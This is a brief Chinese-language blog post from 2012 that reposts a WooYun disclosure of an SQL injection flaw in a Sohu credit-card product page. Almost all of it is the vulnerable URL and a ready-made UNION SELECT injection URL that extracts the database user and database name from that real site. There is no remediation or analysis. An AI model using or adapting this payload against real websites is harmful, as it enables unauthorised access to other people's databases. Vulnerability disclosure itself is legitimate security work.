2012年3月11日 星期日

搜狐SQL


详细说明:

http://card.money.sohu.com/yh/card_product.php?id=70

漏洞证明:

http://card.money.sohu.com/yh/card_product.php?id=70%20and%201=2%20union%20select%201,user(),3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

漏洞来源: http://www.wooyun.org


沒有留言:

張貼留言